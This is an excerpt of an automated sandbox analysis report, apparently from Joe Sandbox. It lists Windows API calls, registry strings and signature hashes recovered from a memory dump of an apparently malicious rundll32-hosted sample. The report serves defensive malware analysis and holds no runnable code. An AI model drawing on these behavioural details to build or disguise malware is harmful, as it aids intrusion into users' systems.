                                            • RtlEnterCriticalSection.NTDLL(?), ref: 058060DA
                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 058060F2
                                            • Sleep.KERNEL32(000001F4), ref: 05806101
                                            • CloseHandle.KERNEL32(?), ref: 0580610E
                                            • LocalFree.KERNEL32(?), ref: 05806119
                                            • RtlDeleteCriticalSection.NTDLL(?), ref: 05806123
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
                                            • String ID:
                                            • API String ID: 1408595562-0
                                            • Opcode ID: 885db0e5c0dc2ee017900d9e2e7215359e700b2ba3d37923e2612b026424bd51
                                            • Instruction ID: ea504673eae5cabc8e05af5b2d6e5c1e07c797460f000c2941893f6f06cbcb8e
                                            • Opcode Fuzzy Hash: 885db0e5c0dc2ee017900d9e2e7215359e700b2ba3d37923e2612b026424bd51
                                            • Instruction Fuzzy Hash: B7116D31244716DFCFB0AB66DC4995BBFA9FF042147019814FA42D34A0EF31F8508B21
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlen.KERNEL32(00000001,00000000,00000000,00000000,0580D2C5,00000000,00000001,?,?,?), ref: 05803827
                                            • lstrlen.KERNEL32(?), ref: 05803837
                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0580386B
                                            • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 05803896
                                            • memcpy.NTDLL(00000000,?,?), ref: 058038B5
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 05803916
                                            • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 05803938
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Allocatelstrlenmemcpy$Free
                                            • String ID: W
                                            • API String ID: 3204852930-655174618
                                            • Opcode ID: 79d66e4c6aa27b98b96282b058865671a01fff7c491d22a0f325ffd0f07fe3cf
                                            • Instruction ID: 9ac5a06696fe24fa442a4d9055e560f1e0f8c0d64b4590ee6b4b9a50ba987787
                                            • Opcode Fuzzy Hash: 79d66e4c6aa27b98b96282b058865671a01fff7c491d22a0f325ffd0f07fe3cf
                                            • Instruction Fuzzy Hash: 0641287290120AEBDF51CF99CC85AAEBFB9FF05244F148869ED05E7250EB309E548B61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 0580F123: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0581C0A9,00000000,00000000,00000004,00000000,?,0581A6B6,?,?,00000000), ref: 0580F12F
                                              • Part of subcall function 0580F123: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0581C0A9,00000000,00000000,00000004,00000000,?,0581A6B6,?), ref: 0580F18D
                                              • Part of subcall function 0580F123: lstrcpy.KERNEL32(00000000,00000000), ref: 0580F19D
                                            • lstrlen.KERNEL32(00000008,?,?,00000000,00000004,00000000), ref: 05812B1A
                                            • wsprintfA.USER32 ref: 05812B48
                                            • lstrlen.KERNEL32(00000000,20000000,?,00000000,00000001,00000000,00000000,00000008,00000030), ref: 05812BA6
                                            • GetLastError.KERNEL32 ref: 05812BBD
                                            • ResetEvent.KERNEL32(?), ref: 05812BD1
                                            • ResetEvent.KERNEL32(?), ref: 05812BD6
                                            • GetLastError.KERNEL32 ref: 05812BEE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$ErrorEventLastReset$lstrcpymemcpywsprintf
                                            • String ID: `
                                            • API String ID: 2276693960-1850852036
                                            • Opcode ID: 8875ae2af7e97b80945468d64a905adc6d9c6aaf155b803e70754a5fb945dadf
                                            • Instruction ID: a09503fae4e38ff4782c9417314eadf4fd67b483441e6c5cf0004a0013d5bf48
                                            • Opcode Fuzzy Hash: 8875ae2af7e97b80945468d64a905adc6d9c6aaf155b803e70754a5fb945dadf
                                            • Instruction Fuzzy Hash: B1415975500209EFDF21EFA5DD49AAA7FB9FF14314F008415FD02E2150DB70AA54DB66
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlen.KERNEL32(0580D8E9,00000000,?,?,?,?,0580D8E9,00000035,00000000,?,00000000), ref: 05803652
                                            • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 05803668
                                            • memcpy.NTDLL(00000010,0580D8E9,00000000,?,?,0580D8E9,00000035,00000000), ref: 0580369E
                                            • memcpy.NTDLL(00000010,00000000,00000035,?,?,0580D8E9,00000035), ref: 058036B9
                                            • CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 058036D7
                                            • GetLastError.KERNEL32(?,?,0580D8E9,00000035), ref: 058036E1
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,0580D8E9,00000035), ref: 05803704
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                                            • String ID: (
                                            • API String ID: 2237239663-3887548279
                                            • Opcode ID: f4833630a4ff9e17d7250817cc4913eaf208bdac822abe79715e66b8c32eba0d
                                            • Instruction ID: c256061ced9de1de88f870025647e14a07c9879caadf485f6fde492dff5b86d4
                                            • Opcode Fuzzy Hash: f4833630a4ff9e17d7250817cc4913eaf208bdac822abe79715e66b8c32eba0d
                                            • Instruction Fuzzy Hash: C7319F76500209EFDB60CFA5DC45AAB7FB9FB44750F048825FD16D2250DA30ED94DBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 05806793
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 0580684B
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 058067E1
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 058067FA
                                            • GetLastError.KERNEL32(?,?,?,?), ref: 05806819
                                            • FreeLibrary.KERNEL32(00000000,?,?,?,?), ref: 0580682B
                                            • GetLastError.KERNEL32(?,?,?,?), ref: 05806833
                                            Strings
                                            • Software\Microsoft\WAB\DLLPath, xrefs: 05806784
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
                                            • String ID: Software\Microsoft\WAB\DLLPath
                                            • API String ID: 1628847533-3156921957
                                            • Opcode ID: 8d4588e826d1015b5f050b33f4e551007211e57ddb3ea7199f65207b91bd94f3
                                            • Instruction ID: a2cc19307963ee962ec72997b2953e9d4acd1e7fdf7d92a5ec55eedbb7ff7cda
                                            • Opcode Fuzzy Hash: 8d4588e826d1015b5f050b33f4e551007211e57ddb3ea7199f65207b91bd94f3
                                            • Instruction Fuzzy Hash: 0721A772900218FFDB61ABA6DC4ACAEBFBDFB48610B115165FD02E3150EB315D50CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlAllocateHeap.NTDLL ref: 0581A340
                                            • memset.NTDLL ref: 0581A354
                                              • Part of subcall function 0580EEA4: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,765BD3B0,76C85520,?,?,?,058021C2,?), ref: 0580EEDC
                                              • Part of subcall function 0580EEA4: RtlAllocateHeap.NTDLL(00000000,?), ref: 0580EEF0
                                              • Part of subcall function 0580EEA4: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,058021C2,?,?,?), ref: 0580EF0A
                                              • Part of subcall function 0580EEA4: RegCloseKey.KERNEL32(?,?,?,?,058021C2,?,?,?), ref: 0580EF34
                                            • GetCurrentThreadId.KERNEL32 ref: 0581A3E1
                                            • GetCurrentThread.KERNEL32 ref: 0581A3F4
                                            • RtlEnterCriticalSection.NTDLL(05D7C2D0), ref: 0581A49B
                                            • Sleep.KERNEL32(0000000A), ref: 0581A4A5
                                            • RtlLeaveCriticalSection.NTDLL(05D7C2D0), ref: 0581A4CB
                                            • HeapFree.KERNEL32(00000000,?), ref: 0581A4F9
                                            • HeapFree.KERNEL32(00000000,00000018), ref: 0581A50C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
                                            • String ID:
                                            • API String ID: 1146182784-0
                                            • Opcode ID: f5ee589c3368eb82daf79f42fab4f6c9fc71bddde5d44f485c54f32cc5a8fcc4
                                            • Instruction ID: c5feb0b39d02a08e3aae0a3dd496eae4a213eabe9b2373100bc820710bfa5826
                                            • Opcode Fuzzy Hash: f5ee589c3368eb82daf79f42fab4f6c9fc71bddde5d44f485c54f32cc5a8fcc4
                                            • Instruction Fuzzy Hash: B1515BB1518305AFD720DF65D88996ABFE9FB48210F008C2DFD86D7250D730ED898B96
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 0581ACA0: RtlEnterCriticalSection.NTDLL(05829448), ref: 0581ACA8
                                              • Part of subcall function 0581ACA0: RtlLeaveCriticalSection.NTDLL(05829448), ref: 0581ACBD
                                              • Part of subcall function 0581ACA0: InterlockedIncrement.KERNEL32(0000001C), ref: 0581ACD6
                                            • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 058106BF
                                            • memset.NTDLL ref: 058106D0
                                            • lstrcmpi.KERNEL32(?,?), ref: 05810710
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0581073C
                                            • memcpy.NTDLL(00000000,?,?), ref: 05810750
                                            • memset.NTDLL ref: 0581075D
                                            • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 05810776
                                            • memcpy.NTDLL(-00000005,?,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 05810799
                                            • HeapFree.KERNEL32(00000000,?), ref: 058107B6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
                                            • String ID:
                                            • API String ID: 694413484-0
                                            • Opcode ID: 5c07dffe99da0517dad68d3e17436fc1cb5d673a1be1ad5e157ce99f103df97d
                                            • Instruction ID: 5ce0d7b03554de61fca5f818df0223129013cecd56e7a8ac9de84f94fd8a95c9
                                            • Opcode Fuzzy Hash: 5c07dffe99da0517dad68d3e17436fc1cb5d673a1be1ad5e157ce99f103df97d
                                            • Instruction Fuzzy Hash: CC416F72A00219EFDB209FA5DC8DA9D7FB9BB04314F148429FD05E7250EB35AE848B54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000022,00000000,00000000,00000000,?,?), ref: 0581790C
                                            • lstrlen.KERNEL32(?), ref: 05817914
                                            • lstrlen.KERNEL32(?), ref: 0581797F
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 058179AA
                                            • memcpy.NTDLL(00000000,00000002,?), ref: 058179BB
                                            • memcpy.NTDLL(00000000,?,?), ref: 058179D1
                                            • memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 058179E3
                                            • memcpy.NTDLL(00000000,058243E8,00000002,00000000,?,?,00000000,?,?), ref: 058179F6
                                            • memcpy.NTDLL(00000000,?,00000002), ref: 05817A0B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memcpy$lstrlen$AllocateHeap
                                            • String ID:
                                            • API String ID: 3386453358-0
                                            • Opcode ID: 673ed4f2b7a176c9e3a049077eec87678a8678b8f0602fb32fc0fc1986bd4e9f
                                            • Instruction ID: e840e972d0f2761b8f9087a7175e1d6154193f5cf4f0f13a4ddafa753c39f32e
                                            • Opcode Fuzzy Hash: 673ed4f2b7a176c9e3a049077eec87678a8678b8f0602fb32fc0fc1986bd4e9f
                                            • Instruction Fuzzy Hash: D8412C72E01219EBCF11DFA8CC84A9EBFB9FF48214F14445AED06E7211E731AA54CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 0581ACA0: RtlEnterCriticalSection.NTDLL(05829448), ref: 0581ACA8
                                              • Part of subcall function 0581ACA0: RtlLeaveCriticalSection.NTDLL(05829448), ref: 0581ACBD
                                              • Part of subcall function 0581ACA0: InterlockedIncrement.KERNEL32(0000001C), ref: 0581ACD6
                                            • RtlAllocateHeap.NTDLL(00000000,058079C7,00000000), ref: 0581B896
                                            • lstrlen.KERNEL32(00000008,?,?,?,058079C7,00000000), ref: 0581B8A5
                                            • RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 0581B8B7
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,058079C7,00000000), ref: 0581B8C7
                                            • memcpy.NTDLL(00000000,00000000,058079C7,?,?,?,058079C7,00000000), ref: 0581B8D9
                                            • lstrcpy.KERNEL32(00000020), ref: 0581B90B
                                            • RtlEnterCriticalSection.NTDLL(05829448), ref: 0581B917
                                            • RtlLeaveCriticalSection.NTDLL(05829448), ref: 0581B96F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
                                            • String ID:
                                            • API String ID: 3746371830-0
                                            • Opcode ID: f74de4735efd04329567ec50704ff9c442b83ff51c8c7311045631d7e0e8d47f
                                            • Instruction ID: dcabd1bad582dc742015173a32bdc4341a693d383974cd91786a08a96ace92a7
                                            • Opcode Fuzzy Hash: f74de4735efd04329567ec50704ff9c442b83ff51c8c7311045631d7e0e8d47f
                                            • Instruction Fuzzy Hash: 804147B1510709EFCB218F68D885B6ABFB8FB04756F108519FC4AD7210EB70E994CBA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 0580A689: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0580A6BB
                                              • Part of subcall function 0580A689: HeapFree.KERNEL32(00000000,00000000,?,?,0580158A,?,00000022,00000000,00000000,00000000,?,?), ref: 0580A6E0
                                              • Part of subcall function 05802CBD: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,058015AB,?,?,?,?,?,00000022,00000000,00000000), ref: 05802CF9
                                              • Part of subcall function 05802CBD: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,058015AB,?,?,?,?,?,00000022,00000000,00000000,00000000,?), ref: 05802D4C
                                            • lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 058015E0
                                            • lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 058015E8
                                            • lstrlen.KERNEL32(?), ref: 058015F2
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 05801607
                                            • wsprintfA.USER32 ref: 05801643
                                            • HeapFree.KERNEL32(00000000,00000000,0000002D,00000000,00000000,00000000), ref: 05801662
                                            • HeapFree.KERNEL32(00000000,?), ref: 05801677
                                            • HeapFree.KERNEL32(00000000,?), ref: 05801684
                                            • HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 05801692
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Free$lstrlen$Allocate$wsprintf
                                            • String ID:
                                            • API String ID: 168057987-0
                                            • Opcode ID: 7ba011d8d0979ccecaf9ab8090308e94fafacc8886ade51e6d921cfa337ff70c
                                            • Instruction ID: 849b0254bcb2e54d31fefeb77fd8c69a35978ce65bb832bc1b70213385c1009c
                                            • Opcode Fuzzy Hash: 7ba011d8d0979ccecaf9ab8090308e94fafacc8886ade51e6d921cfa337ff70c
                                            • Instruction Fuzzy Hash: 4B318D31604314BBDB61AFA4DC49EAA7EA8EF48320F01492AFD45D2190DB70DC548BA6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateFileW.KERNEL32(?,C0000000,0000FDE9,00000000,00000001,00000080,00000000,00000008,00000000,0000FDE9,?), ref: 058034C6
                                            • GetLastError.KERNEL32 ref: 058034D0
                                            • WaitForSingleObject.KERNEL32(000000C8), ref: 058034F5
                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 05803518
                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 05803540
                                            • WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 05803555
                                            • SetEndOfFile.KERNEL32(?), ref: 05803562
                                            • GetLastError.KERNEL32 ref: 0580356E
                                            • CloseHandle.KERNEL32(?), ref: 0580357A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
                                            • String ID:
                                            • API String ID: 2864405449-0
                                            • Opcode ID: cb7cdb80fdc5ca758d3bf570124d1a28c238fb00a70973a6656593eb6a69238c
                                            • Instruction ID: e62ea222ef2afb2ba634c341c55c22f939523d217f2dc8791b2806f38e119677
                                            • Opcode Fuzzy Hash: cb7cdb80fdc5ca758d3bf570124d1a28c238fb00a70973a6656593eb6a69238c
                                            • Instruction Fuzzy Hash: 37315C71900208BFEB609FA5DC4ABAE7FB9FB05326F208554FD11E61E0CB705E949B61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,0580F6B3,00000008,00000001,00000010,00000001,00000000,0000003A,00000001,00000000), ref: 05806972
                                            • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 058069A6
                                            • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 058069AE
                                            • GetLastError.KERNEL32 ref: 058069B8
                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00002710), ref: 058069D4
                                            • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 058069ED
                                            • CancelIo.KERNEL32(?), ref: 05806A02
                                            • CloseHandle.KERNEL32(?), ref: 05806A12
                                            • GetLastError.KERNEL32 ref: 05806A1A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
                                            • String ID:
                                            • API String ID: 4263211335-0
                                            • Opcode ID: 7c04c8b9a34d71b59ae6bc59c2b3cca94b4854f8108a71241994f40f6c9fe32c
                                            • Instruction ID: 00bfd5115ab659d8af7b8531369ef2e9e39816ddc9b176ac5ad442289253059d
                                            • Opcode Fuzzy Hash: 7c04c8b9a34d71b59ae6bc59c2b3cca94b4854f8108a71241994f40f6c9fe32c
                                            • Instruction Fuzzy Hash: 62216032910118BFDF51AFA6DC499EE7F7AFB44310B108021FD16D6190EB309AA08BA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 058039EE
                                            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 05803A04
                                            • _snwprintf.NTDLL ref: 05803A29
                                            • CreateFileMappingW.KERNEL32(000000FF,05829208,00000004,00000000,00001000,?,?,54D38000,00000192), ref: 05803A45
                                            • GetLastError.KERNEL32 ref: 05803A57
                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 05803A6E
                                            • CloseHandle.KERNEL32(00000000), ref: 05803A8F
                                            • GetLastError.KERNEL32 ref: 05803A97
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                            • String ID:
                                            • API String ID: 1814172918-0
                                            • Opcode ID: f0f06d025b428793605be520a2f061f3daf5e3a4682378f27733747d6a43be44
                                            • Instruction ID: de6581284895cb75b55a1b89324f5d38364108cfdb0a22e29c1d4ff155737736
                                            • Opcode Fuzzy Hash: f0f06d025b428793605be520a2f061f3daf5e3a4682378f27733747d6a43be44
                                            • Instruction Fuzzy Hash: 3621D576741218BFDB61DB68DC0AF8E3FA9AB48710F114021FE16E71D0DE70AD448B61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlenW.KERNEL32(00000000,?,05D79A03,?,?,05D79A03,?,?,05D79A03,?,?,05D79A03,?,00000000,00000000,00000000), ref: 0580B3AB
                                            • lstrcpyW.KERNEL32(00000000,?), ref: 0580B3CE
                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 0580B3D6
                                            • lstrlenW.KERNEL32(00000000,?,05D79A03,?,?,05D79A03,?,?,05D79A03,?,?,05D79A03,?,?,05D79A03,?), ref: 0580B421
                                            • memcpy.NTDLL(00000000,?,?,?,?,?,?,0580980E,?), ref: 0580B489
                                            • LocalFree.KERNEL32(?,?,?,?,?,0580980E,?), ref: 0580B4A2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
                                            • String ID: P
                                            • API String ID: 3649579052-3110715001
                                            • Opcode ID: 32ba602aa385878ff6452edf71cc0b16139b4515fb2554257dbf67279507224b
                                            • Instruction ID: 37b1788c313bebe6c8467ce007b2134593687aeaa7add231d0f324f30cea7e10
                                            • Opcode Fuzzy Hash: 32ba602aa385878ff6452edf71cc0b16139b4515fb2554257dbf67279507224b
                                            • Instruction Fuzzy Hash: A1615971A0060AAFDF60EFA9CC88DAE7FB9FB44315B108025FD05E7250DA35AE45CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 0581D5E6: InterlockedIncrement.KERNEL32(00000018), ref: 0581D637
                                              • Part of subcall function 0581D5E6: RtlLeaveCriticalSection.NTDLL(05D7C378), ref: 0581D6C2
                                            • OpenProcess.KERNEL32(00000410,?,?,?,00000000,?,0000001C,00000000,00000000,?,?,?,0580E219,?), ref: 0581D872
                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104,?,00000000,?,0000001C,00000000,00000000,?,?,?,0580E219,?), ref: 0581D890
                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0581D8F8
                                            • lstrlenW.KERNEL32(?), ref: 0581D96D
                                            • GetSystemTimeAsFileTime.KERNEL32(00000008,0000001A), ref: 0581D989
                                            • memcpy.NTDLL(00000014,?,00000002), ref: 0581D9A1
                                              • Part of subcall function 05801924: RtlLeaveCriticalSection.NTDLL(?), ref: 058019A1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Time$CriticalFileLeaveSectionSystem$CloseHandleIncrementInterlockedOpenProcesslstrlenmemcpy
                                            • String ID: o
                                            • API String ID: 2541713525-252678980
                                            • Opcode ID: 7c269b4f102df9ee1898da5367106477b17d9ad2b78bbd8527ffb7810fca6b3d
                                            • Instruction ID: 473eabaefa71b9fa9ed9b253555f364c597bcaabb48585b846a4cc642ed06d9a
                                            • Opcode Fuzzy Hash: 7c269b4f102df9ee1898da5367106477b17d9ad2b78bbd8527ffb7810fca6b3d
                                            • Instruction Fuzzy Hash: 93516B71651706ABDB20DF64D889BAABBECFF04704F008529EE57D7250DB70E984CB98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 0581BAC0: RegCreateKeyA.ADVAPI32(80000001,05D7B7F0,?), ref: 0581BAD5
                                              • Part of subcall function 0581BAC0: lstrlen.KERNEL32(05D7B7F0,00000000,00000000,0582806E,?,?,?,05806B9D,00000001,00000000,?), ref: 0581BAFE
                                            • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 05809890
                                            • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 058098A8
                                            • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 0580990A
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0580991E
                                            • WaitForSingleObject.KERNEL32(00000000,?,00000000,?), ref: 05809970
                                            • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 05809999
                                            • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 058099A9
                                            • RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 058099B2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
                                            • String ID:
                                            • API String ID: 3503961013-0
                                            • Opcode ID: c2ed5a172a02f07bc4eef489d3368036e433e6961d3e6cdcf0ad626862e64d13
                                            • Instruction ID: 2d4a8e918bf1fb26427fa35ca11bfd7deab79244f5b303d8d60c76ed4616dd7d
                                            • Opcode Fuzzy Hash: c2ed5a172a02f07bc4eef489d3368036e433e6961d3e6cdcf0ad626862e64d13
                                            • Instruction Fuzzy Hash: 0041D1B5D1020DEFDF519FA4DC858EEBFBAFB08314F10846AFA01E2260D6355E949B61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,05812B68), ref: 0580B18B
                                            • wsprintfA.USER32 ref: 0580B1B3
                                            • lstrlen.KERNEL32(?), ref: 0580B1C2
                                              • Part of subcall function 0580C6B8: HeapFree.KERNEL32(00000000,00000000,05821A9A,00000000), ref: 0580C6C4
                                            • wsprintfA.USER32 ref: 0580B202
                                            • wsprintfA.USER32 ref: 0580B237
                                            • memcpy.NTDLL(00000000,?,?), ref: 0580B244
                                            • memcpy.NTDLL(00000008,058243E8,00000002,00000000,?,?), ref: 0580B259
                                            • wsprintfA.USER32 ref: 0580B27C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
